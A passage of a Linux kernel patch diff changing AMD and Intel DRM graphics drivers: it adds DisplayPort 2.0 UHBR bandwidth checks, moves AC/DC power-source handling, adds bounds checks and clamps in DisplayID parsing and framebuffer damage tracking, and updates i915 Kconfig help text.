++									v->AudioSampleRate[k],
++									v->AudioSampleLayout[k],
++									v->ODMCombineEnablePerState[i][k]);
++							v->OutputBppPerState[i][k] = v->Outbpp;
++							// TODO: Need some other way to handle this nonsense
++							// v->OutputTypeAndRatePerState[i][k] = v->Output[k] & " HBR2"
++						}
++						if (v->Outbpp == BPP_INVALID && v->PHYCLKPerState[i] >= 810.0) {
++							v->Outbpp = TruncToValidBPP(
++									(1.0 - v->Downspreading / 100.0) * 8100,
++									v->OutputLinkDPLanes[k],
++									v->HTotal[k],
++									v->HActive[k],
++									v->PixelClockBackEnd[k],
++									v->ForcedOutputLinkBPP[k],
++									v->LinkDSCEnable,
++									v->Output[k],
++									v->OutputFormat[k],
++									v->DSCInputBitPerComponent[k],
++									v->NumberOfDSCSlices[k],
++									v->AudioSampleRate[k],
++									v->AudioSampleLayout[k],
++									v->ODMCombineEnablePerState[i][k]);
++							v->OutputBppPerState[i][k] = v->Outbpp;
++							// TODO: Need some other way to handle this nonsense
++							// v->OutputTypeAndRatePerState[i][k] = v->Output[k] & " HBR3"
++						}
+ 					}
+ 				}
+ 			} else {
+@@ -5095,7 +5189,7 @@ void dml31_ModeSupportAndSystemConfigurationFull(struct display_mode_lib *mode_l
+ 							v->DETBufferSizeCThisState[k],
+ 							&v->UrgentBurstFactorCursorPre[k],
+ 							&v->UrgentBurstFactorLumaPre[k],
+-							&v->UrgentBurstFactorChroma[k],
++							&v->UrgentBurstFactorChromaPre[k],
+ 							&v->NotUrgentLatencyHidingPre[k]);
+ 				}
+ 
+diff --git a/drivers/gpu/drm/amd/display/dc/dml/dcn314/dcn314_fpu.c b/drivers/gpu/drm/amd/display/dc/dml/dcn314/dcn314_fpu.c
+index 4f91e64754239..bf77e56c3f3ef 100644
+--- a/drivers/gpu/drm/amd/display/dc/dml/dcn314/dcn314_fpu.c
++++ b/drivers/gpu/drm/amd/display/dc/dml/dcn314/dcn314_fpu.c
+@@ -310,6 +310,10 @@ int dcn314_populate_dml_pipes_from_context_fpu(struct dc *dc, struct dc_state *c
+ 				pipe->plane_state->src_rect.width < pipe->plane_state->dst_rect.width))
+ 			upscaled = true;
+ 
++		/* Apply HostVM policy: based either on the hypervisor being globally enabled or on the rIOMMU being active */
++		if (dc->debug.dml_hostvm_override == DML_HOSTVM_NO_OVERRIDE)
++			pipes[i].pipe.src.hostvm = dc->vm_pa_config.is_hvm_enabled || dc->res_pool->hubbub->riommu_active;
++
+ 		/*
+ 		 * Immediate flip can be set dynamically after enabling the plane.
+ 		 * We need to require support for immediate flip or underflow can be
+diff --git a/drivers/gpu/drm/amd/display/dc/dml/dcn314/display_mode_vba_314.c b/drivers/gpu/drm/amd/display/dc/dml/dcn314/display_mode_vba_314.c
+index 3afd3c80e6da8..4998b211ccac7 100644
+--- a/drivers/gpu/drm/amd/display/dc/dml/dcn314/display_mode_vba_314.c
++++ b/drivers/gpu/drm/amd/display/dc/dml/dcn314/display_mode_vba_314.c
+@@ -4403,11 +4403,11 @@ void dml314_ModeSupportAndSystemConfigurationFull(struct display_mode_lib *mode_
+ 							v->AudioSampleRate[k],
+ 							v->AudioSampleLayout[k],
+ 							v->ODMCombineEnablePerState[i][k]);
+-				} else if (v->Output[k] == dm_dp || v->Output[k] == dm_edp) {
++				} else if (v->Output[k] == dm_dp || v->Output[k] == dm_edp || v->Output[k] == dm_dp2p0) {
+ 					if (v->DSCEnable[k] == true) {
+ 						v->RequiresDSC[i][k] = true;
+ 						v->LinkDSCEnable = true;
+-						if (v->Output[k] == dm_dp) {
++						if (v->Output[k] == dm_dp || v->Output[k] == dm_dp2p0) {
+ 							v->RequiresFEC[i][k] = true;
+ 						} else {
+ 							v->RequiresFEC[i][k] = false;
+@@ -4415,107 +4415,201 @@ void dml314_ModeSupportAndSystemConfigurationFull(struct display_mode_lib *mode_
+ 					} else {
+ 						v->RequiresDSC[i][k] = false;
+ 						v->LinkDSCEnable = false;
+-						v->RequiresFEC[i][k] = false;
+-					}
+-
+-					v->Outbpp = BPP_INVALID;
+-					if (v->PHYCLKPerState[i] >= 270.0) {
+-						v->Outbpp = TruncToValidBPP(
+-								(1.0 - v->Downspreading / 100.0) * 2700,
+-								v->OutputLinkDPLanes[k],
+-								v->HTotal[k],
+-								v->HActive[k],
+-								v->PixelClockBackEnd[k],
+-								v->ForcedOutputLinkBPP[k],
+-								v->LinkDSCEnable,
+-								v->Output[k],
+-								v->OutputFormat[k],
+-								v->DSCInputBitPerComponent[k],
+-								v->NumberOfDSCSlices[k],
+-								v->AudioSampleRate[k],
+-								v->AudioSampleLayout[k],
+-								v->ODMCombineEnablePerState[i][k]);
+-						v->OutputBppPerState[i][k] = v->Outbpp;
+-						// TODO: Need some other way to handle this nonsense
+-						// v->OutputTypeAndRatePerState[i][k] = v->Output[k] & " HBR"
+-					}
+-					if (v->Outbpp == BPP_INVALID && v->PHYCLKPerState[i] >= 540.0) {
+-						v->Outbpp = TruncToValidBPP(
+-								(1.0 - v->Downspreading / 100.0) * 5400,
+-								v->OutputLinkDPLanes[k],
+-								v->HTotal[k],
+-								v->HActive[k],
+-								v->PixelClockBackEnd[k],
+-								v->ForcedOutputLinkBPP[k],
+-								v->LinkDSCEnable,
+-								v->Output[k],
+-								v->OutputFormat[k],
+-								v->DSCInputBitPerComponent[k],
+-								v->NumberOfDSCSlices[k],
+-								v->AudioSampleRate[k],
+-								v->AudioSampleLayout[k],
+-								v->ODMCombineEnablePerState[i][k]);
+-						v->OutputBppPerState[i][k] = v->Outbpp;
+-						// TODO: Need some other way to handle this nonsense
+-						// v->OutputTypeAndRatePerState[i][k] = v->Output[k] & " HBR2"
+-					}
+-					if (v->Outbpp == BPP_INVALID && v->PHYCLKPerState[i] >= 810.0) {
+-						v->Outbpp = TruncToValidBPP(
+-								(1.0 - v->Downspreading / 100.0) * 8100,
+-								v->OutputLinkDPLanes[k],
+-								v->HTotal[k],
+-								v->HActive[k],
+-								v->PixelClockBackEnd[k],
+-								v->ForcedOutputLinkBPP[k],
+-								v->LinkDSCEnable,
+-								v->Output[k],
+-								v->OutputFormat[k],
+-								v->DSCInputBitPerComponent[k],
+-								v->NumberOfDSCSlices[k],
+-								v->AudioSampleRate[k],
+-								v->AudioSampleLayout[k],
+-								v->ODMCombineEnablePerState[i][k]);
+-						v->OutputBppPerState[i][k] = v->Outbpp;
+-						// TODO: Need some other way to handle this nonsense
+-						// v->OutputTypeAndRatePerState[i][k] = v->Output[k] & " HBR3"
+-					}
+-					if (v->Outbpp == BPP_INVALID && v->PHYCLKD18PerState[i] >= 10000.0 / 18) {
+-						v->Outbpp = TruncToValidBPP(
+-								(1.0 - v->Downspreading / 100.0) * 10000,
+-								4,
+-								v->HTotal[k],
+-								v->HActive[k],
+-								v->PixelClockBackEnd[k],
+-								v->ForcedOutputLinkBPP[k],
+-								v->LinkDSCEnable,
+-								v->Output[k],
+-								v->OutputFormat[k],
+-								v->DSCInputBitPerComponent[k],
+-								v->NumberOfDSCSlices[k],
+-								v->AudioSampleRate[k],
+-								v->AudioSampleLayout[k],
+-								v->ODMCombineEnablePerState[i][k]);
+-						v->OutputBppPerState[i][k] = v->Outbpp;
+-						//v->OutputTypeAndRatePerState[i][k] = v->Output[k] & "10x4";
++						if (v->Output[k] == dm_dp2p0) {
++							v->RequiresFEC[i][k] = true;
++						} else {
++							v->RequiresFEC[i][k] = false;
++						}
+ 					}
+-					if (v->Outbpp == BPP_INVALID && v->PHYCLKD18PerState[i] >= 12000.0 / 18) {
+-						v->Outbpp = TruncToValidBPP(
+-								12000,
+-								4,
+-								v->HTotal[k],
+-								v->HActive[k],
+-								v->PixelClockBackEnd[k],
+-								v->ForcedOutputLinkBPP[k],
+-								v->LinkDSCEnable,
+-								v->Output[k],
+-								v->OutputFormat[k],
+-								v->DSCInputBitPerComponent[k],
+-								v->NumberOfDSCSlices[k],
+-								v->AudioSampleRate[k],
+-								v->AudioSampleLayout[k],
+-								v->ODMCombineEnablePerState[i][k]);
+-						v->OutputBppPerState[i][k] = v->Outbpp;
+-						//v->OutputTypeAndRatePerState[i][k] = v->Output[k] & "12x4";
++					if (v->Output[k] == dm_dp2p0) {
++						v->Outbpp = BPP_INVALID;
++						if ((v->OutputLinkDPRate[k] == dm_dp_rate_na || v->OutputLinkDPRate[k] == dm_dp_rate_uhbr10) &&
++							v->PHYCLKD18PerState[k] >= 10000.0 / 18.0) {
++							v->Outbpp = TruncToValidBPP(
++									(1.0 - v->Downspreading / 100.0) * 10000,
++									v->OutputLinkDPLanes[k],
++									v->HTotal[k],
++									v->HActive[k],
++									v->PixelClockBackEnd[k],
++									v->ForcedOutputLinkBPP[k],
++									v->LinkDSCEnable,
++									v->Output[k],
++									v->OutputFormat[k],
++									v->DSCInputBitPerComponent[k],
++									v->NumberOfDSCSlices[k],
++									v->AudioSampleRate[k],
++									v->AudioSampleLayout[k],
++									v->ODMCombineEnablePerState[i][k]);
++							if (v->Outbpp == BPP_INVALID && v->PHYCLKD18PerState[k] < 13500.0 / 18.0 &&
++								v->DSCEnable[k] == true && v->ForcedOutputLinkBPP[k] == 0) {
++								v->RequiresDSC[i][k] = true;
++								v->LinkDSCEnable = true;
++								v->Outbpp = TruncToValidBPP(
++										(1.0 - v->Downspreading / 100.0) * 10000,
++										v->OutputLinkDPLanes[k],
++										v->HTotal[k],
++										v->HActive[k],
++										v->PixelClockBackEnd[k],
++										v->ForcedOutputLinkBPP[k],
++										v->LinkDSCEnable,
++										v->Output[k],
++										v->OutputFormat[k],
++										v->DSCInputBitPerComponent[k],
++										v->NumberOfDSCSlices[k],
++										v->AudioSampleRate[k],
++										v->AudioSampleLayout[k],
++										v->ODMCombineEnablePerState[i][k]);
++							}
++							v->OutputBppPerState[i][k] = v->Outbpp;
++							// TODO: Need some other way to handle this nonsense
++							// v->OutputTypeAndRatePerState[i][k] = v->Output[k] & " UHBR10"
++						}
++						if (v->Outbpp == BPP_INVALID &&
++							(v->OutputLinkDPRate[k] == dm_dp_rate_na || v->OutputLinkDPRate[k] == dm_dp_rate_uhbr13p5) &&
++							v->PHYCLKD18PerState[k] >= 13500.0 / 18.0) {
++							v->Outbpp = TruncToValidBPP(
++									(1.0 - v->Downspreading / 100.0) * 13500,
++									v->OutputLinkDPLanes[k],
++									v->HTotal[k],
++									v->HActive[k],
++									v->PixelClockBackEnd[k],
++									v->ForcedOutputLinkBPP[k],
++									v->LinkDSCEnable,
++									v->Output[k],
++									v->OutputFormat[k],
++									v->DSCInputBitPerComponent[k],
++									v->NumberOfDSCSlices[k],
++									v->AudioSampleRate[k],
++									v->AudioSampleLayout[k],
++									v->ODMCombineEnablePerState[i][k]);
++							if (v->Outbpp == BPP_INVALID && v->PHYCLKD18PerState[k] < 20000.0 / 18.0 &&
++								v->DSCEnable[k] == true && v->ForcedOutputLinkBPP[k] == 0) {
++								v->RequiresDSC[i][k] = true;
++								v->LinkDSCEnable = true;
++								v->Outbpp = TruncToValidBPP(
++										(1.0 - v->Downspreading / 100.0) * 13500,
++										v->OutputLinkDPLanes[k],
++										v->HTotal[k],
++										v->HActive[k],
++										v->PixelClockBackEnd[k],
++										v->ForcedOutputLinkBPP[k],
++										v->LinkDSCEnable,
++										v->Output[k],
++										v->OutputFormat[k],
++										v->DSCInputBitPerComponent[k],
++										v->NumberOfDSCSlices[k],
++										v->AudioSampleRate[k],
++										v->AudioSampleLayout[k],
++										v->ODMCombineEnablePerState[i][k]);
++							}
++							v->OutputBppPerState[i][k] = v->Outbpp;
++							// TODO: Need some other way to handle this nonsense
++							// v->OutputTypeAndRatePerState[i][k] = v->Output[k] & " UHBR13p5"
++						}
++						if (v->Outbpp == BPP_INVALID &&
++							(v->OutputLinkDPRate[k] == dm_dp_rate_na || v->OutputLinkDPRate[k] == dm_dp_rate_uhbr20) &&
++							v->PHYCLKD18PerState[k] >= 20000.0 / 18.0) {
++							v->Outbpp = TruncToValidBPP(
++									(1.0 - v->Downspreading / 100.0) * 20000,
++									v->OutputLinkDPLanes[k],
++									v->HTotal[k],
++									v->HActive[k],
++									v->PixelClockBackEnd[k],
++									v->ForcedOutputLinkBPP[k],
++									v->LinkDSCEnable,
++									v->Output[k],
++									v->OutputFormat[k],
++									v->DSCInputBitPerComponent[k],
++									v->NumberOfDSCSlices[k],
++									v->AudioSampleRate[k],
++									v->AudioSampleLayout[k],
++									v->ODMCombineEnablePerState[i][k]);
++							if (v->Outbpp == BPP_INVALID && v->DSCEnable[k] == true &&
++								v->ForcedOutputLinkBPP[k] == 0) {
++								v->RequiresDSC[i][k] = true;
++								v->LinkDSCEnable = true;
++								v->Outbpp = TruncToValidBPP(
++										(1.0 - v->Downspreading / 100.0) * 20000,
++										v->OutputLinkDPLanes[k],
++										v->HTotal[k],
++										v->HActive[k],
++										v->PixelClockBackEnd[k],
++										v->ForcedOutputLinkBPP[k],
++										v->LinkDSCEnable,
++										v->Output[k],
++										v->OutputFormat[k],
++										v->DSCInputBitPerComponent[k],
++										v->NumberOfDSCSlices[k],
++										v->AudioSampleRate[k],
++										v->AudioSampleLayout[k],
++										v->ODMCombineEnablePerState[i][k]);
++							}
++							v->OutputBppPerState[i][k] = v->Outbpp;
++							// TODO: Need some other way to handle this nonsense
++							// v->OutputTypeAndRatePerState[i][k] = v->Output[k] & " UHBR20"
++						}
++					} else {
++						v->Outbpp = BPP_INVALID;
++						if (v->PHYCLKPerState[i] >= 270.0) {
++							v->Outbpp = TruncToValidBPP(
++									(1.0 - v->Downspreading / 100.0) * 2700,
++									v->OutputLinkDPLanes[k],
++									v->HTotal[k],
++									v->HActive[k],
++									v->PixelClockBackEnd[k],
++									v->ForcedOutputLinkBPP[k],
++									v->LinkDSCEnable,
++									v->Output[k],
++									v->OutputFormat[k],
++									v->DSCInputBitPerComponent[k],
++									v->NumberOfDSCSlices[k],
++									v->AudioSampleRate[k],
++									v->AudioSampleLayout[k],
++									v->ODMCombineEnablePerState[i][k]);
++							v->OutputBppPerState[i][k] = v->Outbpp;
++							// TODO: Need some other way to handle this nonsense
++							// v->OutputTypeAndRatePerState[i][k] = v->Output[k] & " HBR"
++						}
++						if (v->Outbpp == BPP_INVALID && v->PHYCLKPerState[i] >= 540.0) {
++							v->Outbpp = TruncToValidBPP(
++									(1.0 - v->Downspreading / 100.0) * 5400,
++									v->OutputLinkDPLanes[k],
++									v->HTotal[k],
++									v->HActive[k],
++									v->PixelClockBackEnd[k],
++									v->ForcedOutputLinkBPP[k],
++									v->LinkDSCEnable,
++									v->Output[k],
++									v->OutputFormat[k],
++									v->DSCInputBitPerComponent[k],
++									v->NumberOfDSCSlices[k],
++									v->AudioSampleRate[k],
++									v->AudioSampleLayout[k],
++									v->ODMCombineEnablePerState[i][k]);
++							v->OutputBppPerState[i][k] = v->Outbpp;
++							// TODO: Need some other way to handle this nonsense
++							// v->OutputTypeAndRatePerState[i][k] = v->Output[k] & " HBR2"
++						}
++						if (v->Outbpp == BPP_INVALID && v->PHYCLKPerState[i] >= 810.0) {
++							v->Outbpp = TruncToValidBPP(
++									(1.0 - v->Downspreading / 100.0) * 8100,
++									v->OutputLinkDPLanes[k],
++									v->HTotal[k],
++									v->HActive[k],
++									v->PixelClockBackEnd[k],
++									v->ForcedOutputLinkBPP[k],
++									v->LinkDSCEnable,
++									v->Output[k],
++									v->OutputFormat[k],
++									v->DSCInputBitPerComponent[k],
++									v->NumberOfDSCSlices[k],
++									v->AudioSampleRate[k],
++									v->AudioSampleLayout[k],
++									v->ODMCombineEnablePerState[i][k]);
++							v->OutputBppPerState[i][k] = v->Outbpp;
++							// TODO: Need some other way to handle this nonsense
++							// v->OutputTypeAndRatePerState[i][k] = v->Output[k] & " HBR3"
++						}
+ 					}
+ 				}
+ 			} else {
+@@ -5192,7 +5286,7 @@ void dml314_ModeSupportAndSystemConfigurationFull(struct display_mode_lib *mode_
+ 							v->DETBufferSizeCThisState[k],
+ 							&v->UrgentBurstFactorCursorPre[k],
+ 							&v->UrgentBurstFactorLumaPre[k],
+-							&v->UrgentBurstFactorChroma[k],
++							&v->UrgentBurstFactorChromaPre[k],
+ 							&v->NotUrgentLatencyHidingPre[k]);
+ 				}
+ 
+diff --git a/drivers/gpu/drm/amd/display/dc/dml/dcn32/display_mode_vba_32.c b/drivers/gpu/drm/amd/display/dc/dml/dcn32/display_mode_vba_32.c
+index e02e9d4b04a95..2bb768413c92a 100644
+--- a/drivers/gpu/drm/amd/display/dc/dml/dcn32/display_mode_vba_32.c
++++ b/drivers/gpu/drm/amd/display/dc/dml/dcn32/display_mode_vba_32.c
+@@ -3333,7 +3333,7 @@ void dml32_ModeSupportAndSystemConfigurationFull(struct display_mode_lib *mode_l
+ 							/* Output */
+ 							&mode_lib->vba.UrgentBurstFactorCursorPre[k],
+ 							&mode_lib->vba.UrgentBurstFactorLumaPre[k],
+-							&mode_lib->vba.UrgentBurstFactorChroma[k],
++							&mode_lib->vba.UrgentBurstFactorChromaPre[k],
+ 							&mode_lib->vba.NotUrgentLatencyHidingPre[k]);
+ 				}
+ 
+diff --git a/drivers/gpu/drm/amd/pm/swsmu/amdgpu_smu.c b/drivers/gpu/drm/amd/pm/swsmu/amdgpu_smu.c
+index 6d03459de5612..91dfc229e34d7 100644
+--- a/drivers/gpu/drm/amd/pm/swsmu/amdgpu_smu.c
++++ b/drivers/gpu/drm/amd/pm/swsmu/amdgpu_smu.c
+@@ -723,6 +723,24 @@ static int smu_late_init(void *handle)
+ 		return ret;
+ 	}
+ 
++	/*
++	 * Explicitly notify PMFW which power mode the system is in, since
++	 * the PMFW may boot the ASIC with a different mode.
++	 * For those supporting ACDC switch via gpio, PMFW will
++	 * handle the switch automatically. Driver involvement
++	 * is unnecessary.
++	 */
++	if (!smu->dc_controlled_by_gpio) {
++		ret = smu_set_power_source(smu,
++					   adev->pm.ac_power ? SMU_POWER_SOURCE_AC :
++					   SMU_POWER_SOURCE_DC);
++		if (ret) {
++			dev_err(adev->dev, "Failed to switch to %s mode!\n",
++				adev->pm.ac_power ? "AC" : "DC");
++			return ret;
++		}
++	}
++
+ 	if ((adev->ip_versions[MP1_HWIP][0] == IP_VERSION(13, 0, 1)) ||
+ 	    (adev->ip_versions[MP1_HWIP][0] == IP_VERSION(13, 0, 3)))
+ 		return 0;
+diff --git a/drivers/gpu/drm/amd/pm/swsmu/smu11/navi10_ppt.c b/drivers/gpu/drm/amd/pm/swsmu/smu11/navi10_ppt.c
+index 0bcd4fe0ef177..ca278280865fa 100644
+--- a/drivers/gpu/drm/amd/pm/swsmu/smu11/navi10_ppt.c
++++ b/drivers/gpu/drm/amd/pm/swsmu/smu11/navi10_ppt.c
+@@ -3406,26 +3406,8 @@ static int navi10_post_smu_init(struct smu_context *smu)
+ 		return 0;
+ 
+ 	ret = navi10_run_umc_cdr_workaround(smu);
+-	if (ret) {
++	if (ret)
+ 		dev_err(adev->dev, "Failed to apply umc cdr workaround!\n");
+-		return ret;
+-	}
+-
+-	if (!smu->dc_controlled_by_gpio) {
+-		/*
+-		 * For Navi1X, manually switch it to AC mode as PMFW
+-		 * may boot it with DC mode.
+-		 */
+-		ret = smu_v11_0_set_power_source(smu,
+-						 adev->pm.ac_power ?
+-						 SMU_POWER_SOURCE_AC :
+-						 SMU_POWER_SOURCE_DC);
+-		if (ret) {
+-			dev_err(adev->dev, "Failed to switch to %s mode!\n",
+-					adev->pm.ac_power ? "AC" : "DC");
+-			return ret;
+-		}
+-	}
+ 
+ 	return ret;
+ }
+diff --git a/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0_7_ppt.c b/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0_7_ppt.c
+index ea4ec937f52e5..9dd92bbdcefdc 100644
+--- a/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0_7_ppt.c
++++ b/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0_7_ppt.c
+@@ -1767,6 +1767,7 @@ static const struct pptable_funcs smu_v13_0_7_ppt_funcs = {
+ 	.enable_mgpu_fan_boost = smu_v13_0_7_enable_mgpu_fan_boost,
+ 	.get_power_limit = smu_v13_0_7_get_power_limit,
+ 	.set_power_limit = smu_v13_0_set_power_limit,
++	.set_power_source = smu_v13_0_set_power_source,
+ 	.get_power_profile_mode = smu_v13_0_7_get_power_profile_mode,
+ 	.set_power_profile_mode = smu_v13_0_7_set_power_profile_mode,
+ 	.set_tool_table_location = smu_v13_0_set_tool_table_location,
+diff --git a/drivers/gpu/drm/drm_displayid.c b/drivers/gpu/drm/drm_displayid.c
+index 38ea8203df45b..7d03159dc1461 100644
+--- a/drivers/gpu/drm/drm_displayid.c
++++ b/drivers/gpu/drm/drm_displayid.c
+@@ -7,13 +7,28 @@
+ #include <drm/drm_edid.h>
+ #include <drm/drm_print.h>
+ 
++static const struct displayid_header *
++displayid_get_header(const u8 *displayid, int length, int index)
++{
++	const struct displayid_header *base;
++
++	if (sizeof(*base) > length - index)
++		return ERR_PTR(-EINVAL);
++
++	base = (const struct displayid_header *)&displayid[index];
++
++	return base;
++}
++
+ static int validate_displayid(const u8 *displayid, int length, int idx)
+ {
+ 	int i, dispid_length;
+ 	u8 csum = 0;
+ 	const struct displayid_header *base;
+ 
+-	base = (const struct displayid_header *)&displayid[idx];
++	base = displayid_get_header(displayid, length, idx);
++	if (IS_ERR(base))
++		return PTR_ERR(base);
+ 
+ 	DRM_DEBUG_KMS("base revision 0x%x, length %d, %d %d\n",
+ 		      base->rev, base->bytes, base->prod_id, base->ext_count);
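The helper added above is a bounds-check-before-cast: refuse to interpret the bytes as a displayid_header unless the remaining slice is at least sizeof(*base) long. The same shape in a self-contained sketch (hdr_t and the NULL-plus-errno convention are illustrative, not the DRM API):

	#include <errno.h>
	#include <stddef.h>
	#include <stdint.h>

	struct hdr_t {	/* illustrative 4-byte header, mirroring displayid_header */
		uint8_t rev;
		uint8_t bytes;
		uint8_t prod_id;
		uint8_t ext_count;
	};

	static const struct hdr_t *get_header(const uint8_t *buf, size_t len,
					      size_t index, int *err)
	{
		/* Reject slices too short to hold a complete header. */
		if (index > len || sizeof(struct hdr_t) > len - index) {
			*err = -EINVAL;
			return NULL;
		}
		*err = 0;
		return (const struct hdr_t *)&buf[index];
	}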
+diff --git a/drivers/gpu/drm/drm_fb_helper.c b/drivers/gpu/drm/drm_fb_helper.c
+index 06cd2f8c27734..76e46713b2f0c 100644
+--- a/drivers/gpu/drm/drm_fb_helper.c
++++ b/drivers/gpu/drm/drm_fb_helper.c
+@@ -708,19 +708,27 @@ static void drm_fb_helper_damage(struct fb_info *info, u32 x, u32 y,
+ static void drm_fb_helper_memory_range_to_clip(struct fb_info *info, off_t off, size_t len,
+ 					       struct drm_rect *clip)
+ {
++	u32 line_length = info->fix.line_length;
++	u32 fb_height = info->var.yres;
+ 	off_t end = off + len;
+ 	u32 x1 = 0;
+-	u32 y1 = off / info->fix.line_length;
++	u32 y1 = off / line_length;
+ 	u32 x2 = info->var.xres;
+-	u32 y2 = DIV_ROUND_UP(end, info->fix.line_length);
++	u32 y2 = DIV_ROUND_UP(end, line_length);
++
++	/* Don't allow any of them beyond the bottom bound of display area */
++	if (y1 > fb_height)
++		y1 = fb_height;
++	if (y2 > fb_height)
++		y2 = fb_height;
+ 
+ 	if ((y2 - y1) == 1) {
+ 		/*
+ 		 * We've only written to a single scanline. Try to reduce
+ 		 * the number of horizontal pixels that need an update.
+ 		 */
+-		off_t bit_off = (off % info->fix.line_length) * 8;
+-		off_t bit_end = (end % info->fix.line_length) * 8;
++		off_t bit_off = (off % line_length) * 8;
++		off_t bit_end = (end % line_length) * 8;
+ 
+ 		x1 = bit_off / info->var.bits_per_pixel;
+ 		x2 = DIV_ROUND_UP(bit_end, info->var.bits_per_pixel);
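The clamping above converts a flushed byte range into damaged scanlines without ever extending past the visible area: with line_length = 4096 and yres = 768, a write at offset 4,000,000 would previously yield y1 = 976, a rectangle well below the framebuffer. A minimal model of the row computation, assuming the same fb_info semantics:

	#include <stddef.h>
	#include <stdint.h>

	#define DIV_ROUND_UP_SKETCH(n, d)	(((n) + (d) - 1) / (d))

	static void range_to_rows(size_t off, size_t len, uint32_t line_length,
				  uint32_t fb_height, uint32_t *y1, uint32_t *y2)
	{
		*y1 = off / line_length;
		*y2 = DIV_ROUND_UP_SKETCH(off + len, line_length);

		/* Clamp both edges so the clip never reaches below the screen. */
		if (*y1 > fb_height)
			*y1 = fb_height;
		if (*y2 > fb_height)
			*y2 = fb_height;
	}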
+diff --git a/drivers/gpu/drm/drm_mipi_dsi.c b/drivers/gpu/drm/drm_mipi_dsi.c
+index f25ddfe37498f..853208e8dd736 100644
+--- a/drivers/gpu/drm/drm_mipi_dsi.c
++++ b/drivers/gpu/drm/drm_mipi_dsi.c
+@@ -221,7 +221,7 @@ mipi_dsi_device_register_full(struct mipi_dsi_host *host,
+ 		return dsi;
+ 	}
+ 
+-	dsi->dev.of_node = info->node;
++	device_set_node(&dsi->dev, of_fwnode_handle(info->node));
+ 	dsi->channel = info->channel;
+ 	strlcpy(dsi->name, info->type, sizeof(dsi->name));
+ 
+diff --git a/drivers/gpu/drm/exynos/exynos_drm_g2d.h b/drivers/gpu/drm/exynos/exynos_drm_g2d.h
+index 74ea3c26deadc..1a5ae781b56c6 100644
+--- a/drivers/gpu/drm/exynos/exynos_drm_g2d.h
++++ b/drivers/gpu/drm/exynos/exynos_drm_g2d.h
+@@ -34,11 +34,11 @@ static inline int exynos_g2d_exec_ioctl(struct drm_device *dev, void *data,
+ 	return -ENODEV;
+ }
+ 
+-int g2d_open(struct drm_device *drm_dev, struct drm_file *file)
++static inline int g2d_open(struct drm_device *drm_dev, struct drm_file *file)
+ {
+ 	return 0;
+ }
+ 
+-void g2d_close(struct drm_device *drm_dev, struct drm_file *file)
++static inline void g2d_close(struct drm_device *drm_dev, struct drm_file *file)
+ { }
+ #endif
+diff --git a/drivers/gpu/drm/i915/Kconfig b/drivers/gpu/drm/i915/Kconfig
+index 3a6e176d77aa5..6b10868ec72ff 100644
+--- a/drivers/gpu/drm/i915/Kconfig
++++ b/drivers/gpu/drm/i915/Kconfig
+@@ -54,23 +54,34 @@ config DRM_I915
+ 	  If "M" is selected, the module will be called i915.
+ 
+ config DRM_I915_FORCE_PROBE
+-	string "Force probe driver for selected new Intel hardware"
++	string "Force probe i915 for selected Intel hardware IDs"
+ 	depends on DRM_I915
+ 	help
+ 	  This is the default value for the i915.force_probe module
+ 	  parameter. Using the module parameter overrides this option.
+ 
+-	  Force probe the driver for new Intel graphics devices that are
+-	  recognized but not properly supported by this kernel version. It is
+-	  recommended to upgrade to a kernel version with proper support as soon
+-	  as it is available.
++	  Force probe the i915 driver for Intel graphics devices that are
++	  recognized but not properly supported by this kernel version. Force
++	  probing an unsupported device taints the kernel. It is recommended to
++	  upgrade to a kernel version with proper support as soon as it is
++	  available.
++
++	  It can also be used to block the probe of recognized and fully
++	  supported devices.
+ 
+ 	  Use "" to disable force probe. If in doubt, use this.
+ 
+-	  Use "<pci-id>[,<pci-id>,...]" to force probe the driver for listed
++	  Use "<pci-id>[,<pci-id>,...]" to force probe the i915 for listed
+ 	  devices. For example, "4500" or "4500,4571".
+ 
+-	  Use "*" to force probe the driver for all known devices.
++	  Use "*" to force probe the driver for all known devices. Not
++	  recommended.
++
++	  Use "!" right before the ID to block the probe of the device. For
++	  example, "4500,!4571" forces the probe of 4500 and blocks the probe of
++	  4571.
++
++	  Use "!*" to block the probe of the driver for all known devices.
+ 
+ config DRM_I915_CAPTURE_ERROR
+ 	bool "Enable capturing GPU state following a hang"
+diff --git a/drivers/gpu/drm/i915/display/intel_atomic_plane.c b/drivers/gpu/drm/i915/display/intel_atomic_plane.c
+index aaa6708256d58..82826454b5e83 100644
+--- a/drivers/gpu/drm/i915/display/intel_atomic_plane.c
++++ b/drivers/gpu/drm/i915/display/intel_atomic_plane.c
+@@ -988,7 +988,7 @@ intel_prepare_plane_fb(struct drm_plane *_plane,
+ 	int ret;
+ 
+ 	if (old_obj) {
+-		const struct intel_crtc_state *crtc_state =
++		const struct intel_crtc_state *new_crtc_state =
+ 			intel_atomic_get_new_crtc_state(state,
+ 							to_intel_crtc(old_plane_state->hw.crtc));
+ 
+@@ -1003,7 +1003,7 @@ intel_prepare_plane_fb(struct drm_plane *_plane,
+ 		 * This should only fail upon a hung GPU, in which case we
+ 		 * can safely continue.
+ 		 */
+-		if (intel_crtc_needs_modeset(crtc_state)) {
++		if (new_crtc_state && intel_crtc_needs_modeset(new_crtc_state)) {
+ 			ret = i915_sw_fence_await_reservation(&state->commit_ready,
+ 							      old_obj->base.resv, NULL,
+ 							      false, 0,
+diff --git a/drivers/gpu/drm/i915/display/intel_dp.c b/drivers/gpu/drm/i915/display/intel_dp.c
+index 2e09899f2f927..b1653308f1450 100644
+--- a/drivers/gpu/drm/i915/display/intel_dp.c
++++ b/drivers/gpu/drm/i915/display/intel_dp.c
+@@ -1512,6 +1512,11 @@ static int intel_dp_dsc_compute_config(struct intel_dp *intel_dp,
+ 		pipe_config->dsc.slice_count =
+ 			drm_dp_dsc_sink_max_slice_count(intel_dp->dsc_dpcd,
+ 							true);
++		if (!pipe_config->dsc.slice_count) {
++			drm_dbg_kms(&dev_priv->drm, "Unsupported Slice Count %d\n",
++				    pipe_config->dsc.slice_count);
++			return -EINVAL;
++		}
+ 	} else {
+ 		u16 dsc_max_output_bpp;
+ 		u8 dsc_dp_slice_count;
+diff --git a/drivers/gpu/drm/i915/gt/uc/intel_guc_capture.c b/drivers/gpu/drm/i915/gt/uc/intel_guc_capture.c
+index 1e1fa20fb41c9..18a8466f85917 100644
+--- a/drivers/gpu/drm/i915/gt/uc/intel_guc_capture.c
++++ b/drivers/gpu/drm/i915/gt/uc/intel_guc_capture.c
